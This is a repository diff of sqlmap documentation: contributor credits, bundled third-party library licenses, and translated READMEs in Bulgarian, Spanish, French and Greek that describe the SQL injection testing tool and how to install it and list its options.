+* for suggesting an enhancement
+
+Ed Williams, <ed.williams(at)ngssecure.com>
+* for suggesting a minor enhancement
+
+Anthony Zboralski, <anthony.zboralski(at)bellua.com>
+* for providing with detailed feedback
+* for reporting a few minor bugs
+* for donating to sqlmap development
+
+Thierry Zoller, <thierry(at)zoller.lu>
+* for reporting a couple of major bugs
+
+Zhen Zhou, <zhouzhenster(at)gmail.com>
+* for suggesting a feature
+
+-insane-, <insane_(at)gmx.de>
+* for reporting a minor bug
+
+1ndr4 joe, <c0d3w4st3r(at)gmail.com>
+* for reporting a couple of bugs
+
+abc abc, <biedimc(at)gmx.net>
+* for reporting a minor bug
+
+Abuse 007, <abuse007(at)gmail.com>
+* for reporting a bug
+
+agix, <florian.gaultier@gmail.com>
+* for contributing the file upload via certutil.exe functionality
+
+Alex, <m3zero(at)gmail.com>
+* for reporting a minor bug
+
+anonymous anonymous, <tmp(at)2ch.so>
+* for reporting a couple of bugs
+
+bamboo, <roberthacksley(at)gmail.com>
+* for reporting a couple of bugs
+
+Brandon E., <brandonpoc(at)gmail.com>
+* for reporting a bug
+
+black zero, <timeisflowing(at)gmail.com>
+* for reporting a minor bug
+
+blueBoy, <blueboy4444(at)gmail.com>
+* for reporting a bug
+
+buawig, <buawig(at)gmail.com>
+* for reporting considerable amount of bugs
+
+Bugtrace, <bugtrace(at)gmail.com>
+* for reporting several bugs
+
+cats, <dump(at)alcor.se>
+* for reporting a couple of bugs
+
+Christian S, <christian_s(at)linuxmail.org>
+* for reporting a minor bug
+
+clav, <elclav(at)gmail.com>
+* for reporting a minor bug
+
+dragoun dash, <dragoun.dash(at)gmail.com>
+* for reporting a minor bug
+
+flsf, <jianmaflsf@gmail.com>
+* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py
+* for contributing a minor patch
+
+fufuh, <fufuh(at)users.sourceforge.net>
+* for reporting a bug when running on Windows
+
+Hans Wurst, <wurstwass0r(at)googlemail.com>
+* for reporting a couple of bugs
+
+Hysia, <hysia(at)huorui.net>
+* for contributing a Chinese translation of README.md
+
+james, <james(at)ev6.net>
+* for reporting a bug
+
+Joe "Pragmatk", <pragmatk(at)gmail.com>
+* for reporting a few bugs
+
+John Smith, <tixos(at)live.com>
+* for reporting several bugs
+* for suggesting some features
+
+m4l1c3, <malice.anon(at)gmail.com>
+* for reporting considerable amount of bugs
+
+mariano, <marianoso(at)gmail.com>
+* for reporting a bug
+
+mitchell, <mitchell(at)tufala.net>
+* for reporting a few bugs
+
+Nadzree, <nadzree(at)bake180.com>
+* for reporting a minor bug
+
+nightman, <nightman(at)email.de>
+* for reporting considerable amount of bugs
+
+Oso Dog osodog123(at)yahoo.com
+* for reporting a minor bug
+
+pacman730, <pacman730(at)users.sourceforge.net>
+* for reporting a bug
+
+pentestmonkey, <pentestmonkey(at)pentestmonkey.net>
+* for reporting several bugs
+* for suggesting a few minor enhancements
+
+Phat R., <phatthanaphol(at)gmail.com>
+* for reporting a few bugs
+
+Phil P, <(at)superevr>
+* for suggesting a minor enhancement
+
+ragos, <ragos(at)joker.ms>
+* for reporting a minor bug
+
+rmillet, <rmillet42(at)gmail.com>
+* for reporting a bug
+
+Rub3nCT, <rub3nct(at)gmail.com>
+* for reporting a minor bug
+
+shiftzwei, <shiftzwei(at)gmail.com>
+* for reporting a couple of bugs
+
+smith, <esmyl911(at)gmail.com>
+* for reporting a minor bug
+
+Soma Cruz, <oleg.kupreev(at)gmail.com>
+* for reporting a minor bug
+
+Spiros94, <cont(at)eyrhka.gr>
+* for contributing a Greek translation of README.md
+
+Stuffe, <stuffe.dk(at)gmail.com>
+* for reporting a minor bug and a feature request
+
+Sylphid, <sylphid.su(at)sti.com.tw>
+* for suggesting some features
+
+syssecurity.info, <syssecurity7(at)googlemail.com>
+* for reporting a minor bug
+
+This LittlePiggy, <thislittlepiggyhadroastbeef(at)hotmail.com>
+* for reporting a minor bug
+
+ToR, <sstidus(at)email.it>
+* for reporting considerable amount of bugs
+* for suggesting a feature
+
+ultramegaman, <seclists(at)ultramegaman.com>
+* for reporting a minor bug
+
+Vinicius, <viniciusmaxdaloop(at)gmail.com>
+* for reporting a minor bug
+
+wanglei, <wanglei(at)17uxi.cn>
+* for reporting a minor bug
+
+warninggp, <warninggp(at)gmail.com>
+* for reporting a few minor bugs
+
+x, <deep_freeze(at)mail.ru>
+* for reporting a bug
+
+zhouhx, <zhouhx(at)knownsec.com>
+* for contributing a minor patch
+
+# Organizations
+
+Black Hat team, <info(at)blackhat.com>
+* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation
+ * Homepage: http://goo.gl/BKfs7
+ * Slides: http://goo.gl/Dh65t
+ * White paper: http://goo.gl/spX3N
+
+SOURCE Conference team, <press(at)sourceconference.com>
+* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation
+ * Homepage: http://goo.gl/IeXV4
+ * Slides: http://goo.gl/OKnfj
+
+AthCon Conference team, <cfp(at)athcon.org>
+* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation
+ * Homepage: http://goo.gl/Fs71I
+ * Slides: http://goo.gl/QMfjO
+
+Metasploit Framework development team, <msfdev(at)metasploit.com>
+* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server
+ * Homepage: http://www.metasploit.com
+
+OWASP Board, <info(at)owasp.org>
+* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007
+ * Homepage: http://www.owasp.org

doc/THIRD-PARTY.md

@@ -0,0 +1,314 @@
+This file lists bundled packages and their associated licensing terms.
+
+# BSD
+
+* The Ansistrm library located under thirdparty/ansistrm/.
+  Copyright (C) 2010-2012, Vinay Sajip.
+* The Beautiful Soup library located under thirdparty/beautifulsoup/.
+  Copyright (C) 2004-2010, Leonard Richardson.
+* The ClientForm library located under thirdparty/clientform/.
+  Copyright (C) 2002-2007, John J. Lee.
+  Copyright (C) 2005, Gary Poster.
+  Copyright (C) 2005, Zope Corporation.
+  Copyright (C) 1998-2000, Gisle Aas.
+* The Colorama library located under thirdparty/colorama/.
+  Copyright (C) 2013, Jonathan Hartley.
+* The Fcrypt library located under thirdparty/fcrypt/.
+  Copyright (C) 2000, 2001, 2004 Carey Evans.
+* The Odict library located under thirdparty/odict/.
+  Copyright (C) 2005, Nicola Larosa, Michael Foord.
+* The Oset library located under thirdparty/oset/.
+  Copyright (C) 2010, BlueDynamics Alliance, Austria.
+  Copyright (C) 2009, Raymond Hettinger, and others.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+  Copyright (C) 2010, Chris Hall.
+* The SocksiPy library located under thirdparty/socks/.
+  Copyright (C) 2006, Dan-Haim.
+
+````
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+     - Redistributions of source code must retain the above copyright
+      notice, this list of conditions and the following disclaimer.
+     - Redistributions in binary form must reproduce the above copyright
+      notice, this list of conditions and the following disclaimer in the
+      documentation and/or other materials provided with the distribution.
+     - Neither the name of the <organization> nor the
+      names of its contributors may be used to endorse or promote products
+      derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+````
+
+# LGPL
+
+* The Chardet library located under thirdparty/chardet/.
+  Copyright (C) 2008, Mark Pilgrim.
+* The Gprof2dot library located under thirdparty/gprof2dot/.
+  Copyright (C) 2008-2009, Jose Fonseca.
+* The KeepAlive library located under thirdparty/keepalive/.
+  Copyright (C) 2002-2003, Michael D. Stenner.
+* The MultipartPost library located under thirdparty/multipart/.
+  Copyright (C) 2006, Will Holcomb.
+* The XDot library located under thirdparty/xdot/.
+  Copyright (C) 2008, Jose Fonseca.
+* The icmpsh tool located under extra/icmpsh/.
+  Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
+
+````
+                   GNU LESSER GENERAL PUBLIC LICENSE
+                       Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+
+  This version of the GNU Lesser General Public License incorporates
+the terms and conditions of version 3 of the GNU General Public
+License, supplemented by the additional permissions listed below.
+
+  0. Additional Definitions.
+
+  As used herein, "this License" refers to version 3 of the GNU Lesser
+General Public License, and the "GNU GPL" refers to version 3 of the GNU
+General Public License.
+
+  "The Library" refers to a covered work governed by this License,
+other than an Application or a Combined Work as defined below.
+
+  An "Application" is any work that makes use of an interface provided
+by the Library, but which is not otherwise based on the Library.
+Defining a subclass of a class defined by the Library is deemed a mode
+of using an interface provided by the Library.
+
+  A "Combined Work" is a work produced by combining or linking an
+Application with the Library.  The particular version of the Library
+with which the Combined Work was made is also called the "Linked
+Version".
+
+  The "Minimal Corresponding Source" for a Combined Work means the
+Corresponding Source for the Combined Work, excluding any source code
+for portions of the Combined Work that, considered in isolation, are
+based on the Application, and not on the Linked Version.
+
+  The "Corresponding Application Code" for a Combined Work means the
+object code and/or source code for the Application, including any data
+and utility programs needed for reproducing the Combined Work from the
+Application, but excluding the System Libraries of the Combined Work.
+
+  1. Exception to Section 3 of the GNU GPL.
+
+  You may convey a covered work under sections 3 and 4 of this License
+without being bound by section 3 of the GNU GPL.
+
+  2. Conveying Modified Versions.
+
+  If you modify a copy of the Library, and, in your modifications, a
+facility refers to a function or data to be supplied by an Application
+that uses the facility (other than as an argument passed when the
+facility is invoked), then you may convey a copy of the modified
+version:
+
+   a) under this License, provided that you make a good faith effort to
+   ensure that, in the event an Application does not supply the
+   function or data, the facility still operates, and performs
+   whatever part of its purpose remains meaningful, or
+
+   b) under the GNU GPL, with none of the additional permissions of
+   this License applicable to that copy.
+
+  3. Object Code Incorporating Material from Library Header Files.
+
+  The object code form of an Application may incorporate material from
+a header file that is part of the Library.  You may convey such object
+code under terms of your choice, provided that, if the incorporated
+material is not limited to numerical parameters, data structure
+layouts and accessors, or small macros, inline functions and templates
+(ten or fewer lines in length), you do both of the following:
+
+   a) Give prominent notice with each copy of the object code that the
+   Library is used in it and that the Library and its use are
+   covered by this License.
+
+   b) Accompany the object code with a copy of the GNU GPL and this license
+   document.
+
+  4. Combined Works.
+
+  You may convey a Combined Work under terms of your choice that,
+taken together, effectively do not restrict modification of the
+portions of the Library contained in the Combined Work and reverse
+engineering for debugging such modifications, if you also do each of
+the following:
+
+   a) Give prominent notice with each copy of the Combined Work that
+   the Library is used in it and that the Library and its use are
+   covered by this License.
+
+   b) Accompany the Combined Work with a copy of the GNU GPL and this license
+   document.
+
+   c) For a Combined Work that displays copyright notices during
+   execution, include the copyright notice for the Library among
+   these notices, as well as a reference directing the user to the
+   copies of the GNU GPL and this license document.
+
+   d) Do one of the following:
+
+       0) Convey the Minimal Corresponding Source under the terms of this
+       License, and the Corresponding Application Code in a form
+       suitable for, and under terms that permit, the user to
+       recombine or relink the Application with a modified version of
+       the Linked Version to produce a modified Combined Work, in the
+       manner specified by section 6 of the GNU GPL for conveying
+       Corresponding Source.
+
+       1) Use a suitable shared library mechanism for linking with the
+       Library.  A suitable mechanism is one that (a) uses at run time
+       a copy of the Library already present on the user's computer
+       system, and (b) will operate properly with a modified version
+       of the Library that is interface-compatible with the Linked
+       Version.
+
+   e) Provide Installation Information, but only if you would otherwise
+   be required to provide such information under section 6 of the
+   GNU GPL, and only to the extent that such information is
+   necessary to install and execute a modified version of the
+   Combined Work produced by recombining or relinking the
+   Application with a modified version of the Linked Version. (If
+   you use option 4d0, the Installation Information must accompany
+   the Minimal Corresponding Source and Corresponding Application
+   Code. If you use option 4d1, you must provide the Installation
+   Information in the manner specified by section 6 of the GNU GPL
+   for conveying Corresponding Source.)
+
+  5. Combined Libraries.
+
+  You may place library facilities that are a work based on the
+Library side by side in a single library together with other library
+facilities that are not Applications and are not covered by this
+License, and convey such a combined library under terms of your
+choice, if you do both of the following:
+
+   a) Accompany the combined library with a copy of the same work based
+   on the Library, uncombined with any other library facilities,
+   conveyed under the terms of this License.
+
+   b) Give prominent notice with the combined library that part of it
+   is a work based on the Library, and explaining where to find the
+   accompanying uncombined form of the same work.
+
+  6. Revised Versions of the GNU Lesser General Public License.
+
+  The Free Software Foundation may publish revised and/or new versions
+of the GNU Lesser General Public License from time to time. Such new
+versions will be similar in spirit to the present version, but may
+differ in detail to address new problems or concerns.
+
+  Each version is given a distinguishing version number. If the
+Library as you received it specifies that a certain numbered version
+of the GNU Lesser General Public License "or any later version"
+applies to it, you have the option of following the terms and
+conditions either of that published version or of any later version
+published by the Free Software Foundation. If the Library as you
+received it does not specify a version number of the GNU Lesser
+General Public License, you may choose any version of the GNU Lesser
+General Public License ever published by the Free Software Foundation.
+
+  If the Library as you received it specifies that a proxy can decide
+whether future versions of the GNU Lesser General Public License shall
+apply, that proxy's public statement of acceptance of any version is
+permanent authorization for you to choose that version for the
+Library.
+````
+
+# PSF
+
+* The Magic library located under thirdparty/magic/.
+  Copyright (C) 2011, Adam Hupp.
+
+````
+PSF LICENSE AGREEMENT FOR PYTHON 2.7.3
+
+This LICENSE AGREEMENT is between the Python Software Foundation (“PSF”),
+and the Individual or Organization (“Licensee”) accessing and otherwise
+using Python 2.7.3 software in source or binary form and its associated
+documentation.
+Subject to the terms and conditions of this License Agreement, PSF hereby
+grants Licensee a nonexclusive, royalty-free, world-wide license to
+reproduce, analyze, test, perform and/or display publicly, prepare
+derivative works, distribute, and otherwise use Python 2.7.3 alone or in any
+derivative version, provided, however, that PSF’s License Agreement and
+PSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software
+Foundation; All Rights Reserved” are retained in Python 2.7.3 alone or in
+any derivative version prepared by Licensee.
+In the event Licensee prepares a derivative work that is based on or
+incorporates Python 2.7.3 or any part thereof, and wants to make the
+derivative work available to others as provided herein, then Licensee hereby
+agrees to include in any such work a brief summary of the changes made to
+Python 2.7.3.
+PSF is making Python 2.7.3 available to Licensee on an “AS IS” basis. PSF
+MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF
+EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION
+OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT
+THE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR
+ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF
+MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE
+THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+This License Agreement will automatically terminate upon a material breach
+of its terms and conditions.
+Nothing in this License Agreement shall be deemed to create any relationship
+of agency, partnership, or joint venture between PSF and Licensee. This
+License Agreement does not grant permission to use PSF trademarks or trade
+name in a trademark sense to endorse or promote products or services of
+Licensee, or any third party.
+By copying, installing or otherwise using Python 2.7.3, Licensee agrees to
+be bound by the terms and conditions of this License Agreement.
+````
+
+# MIT
+
+* The bottle web framework library located under thirdparty/bottle/.
+  Copyright (C) 2012, Marcel Hellkamp.
+* The Termcolor library located under thirdparty/termcolor/.
+  Copyright (C) 2008-2011, Volvox Development Team.
+
+````
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+````
+
+# Public domain
+
+* The PyDes library located under thirdparty/pydes/.
+   Copyleft 2009, Todd Whiteman.
+* The win_inet_pton library located under thirdparty/wininetpton/.
+   Copyleft 2014, Ryan Vennell.

doc/translations/README-bg-BG.md

@@ -0,0 +1,50 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![Лиценз](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
+
+Демо снимки
+----
+
+![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Можете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои  функции, качени на wiki.
+
+Инсталиране
+----
+
+Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи.
+
+Използване
+----
+
+За да получите списък с основните опции използвайте:
+
+    python sqlmap.py -h
+
+За да получите списък с всички опции използвайте:
+
+    python sqlmap.py -hh
+
+Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601).
+За да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Връзки
+----
+
+* Начална страница: http://sqlmap.org
+* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues
+* Упътване: https://github.com/sqlmapproject/sqlmap/wiki
+* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-es-MX.md

@@ -0,0 +1,49 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
+
+Capturas de Pantalla
+---
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki).
+
+Instalación
+---
+
+Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma.
+
+Uso
+---
+
+Para obtener una lista de opciones básicas: 
+
+    python sqlmap.py -h
+
+Para obtener una lista de todas las opciones:
+
+    python sqlmap.py -hh
+
+Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601).
+Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Enlaces
+---
+
+* Página principal: http://sqlmap.org 
+* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
+* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
+* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-fr-FR.md

@@ -0,0 +1,49 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
+
+----
+
+![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__.
+
+Installation
+----
+
+Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)  
+
+Usage
+----
+
+Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:
+
+    python sqlmap.py -h
+
+Pour afficher une liste complète des options et des commutateurs (switches), tapez:
+
+    python sqlmap.py -hh
+
+Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
+Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Liens
+----
+
+* Page d'acceuil: http://sqlmap.org
+* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
+* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-gr-GR.md

@@ -0,0 +1,50 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
+
+Εικόνες
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
+
+Εγκατάσταση
+----
+
+Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
+
+Χρήση
+----
+
+Για να δείτε μια βασική λίστα από επιλογές πατήστε:
+
+    python sqlmap.py -h
+
+Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
+
+    python sqlmap.py -hh
+
+Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601).
